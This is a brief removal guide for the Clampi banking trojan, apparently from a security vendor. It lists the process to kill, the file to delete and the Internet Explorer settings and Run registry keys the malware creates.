Clampi can be fairly easily removed from the system without too much problem. However unlike Mebroot/Torpig, it will not store the stolen credentials on the local machine, so it’s not possible to detect exactly what has been stolen.

To remove Clampi, do the following:

  • Kill the sound.exe process (or whatever the filename is) that launches the Internet Explorer.
    • This alone will already kill the C&C communication
    • Remove the file on your harddrive (usually in %UserProfile%Application Data)
    • Start the registry editor (regedit) and delete the following keys (make sure you do a backup of the registry before doing it)
      • HKEY_CURRENT_USER SoftwareMicrosoftInternet ExplorerSettingsGID
      • HKEY_CURRENT_USER SoftwareMicrosoftInternet ExplorerSettingsPID
      • HKEY_CURRENT_USER SoftwareMicrosoftInternet ExplorerSettingsGatesList
      • HKEY_CURRENT_USER SoftwareMicrosoftInternet ExplorerSettingsKeyM
      • HKEY_CURRENT_USER SoftwareMicrosoftInternet ExplorerSettingsKeyE
      • HKEY_CURRENT_USER SoftwareMicrosoftInternet ExplorerSettingsM00
      • HKEY_CURRENT_USER SoftwareMicrosoftInternet ExplorerSettingsM<XX>

      and

      • HKEY_CURRENT_USER Software MicrosoftWindowsCurrentVersionRun<NAME> (in our case Sound – just look for the one with the right value pointing to the executable in %UserProfile%Application Data

Restart the computer and Clampi should be removed.

Further Information

Further information can be obtained from TrustDefender at labs@trustdefender.com as well as the in-depth report of Clampi.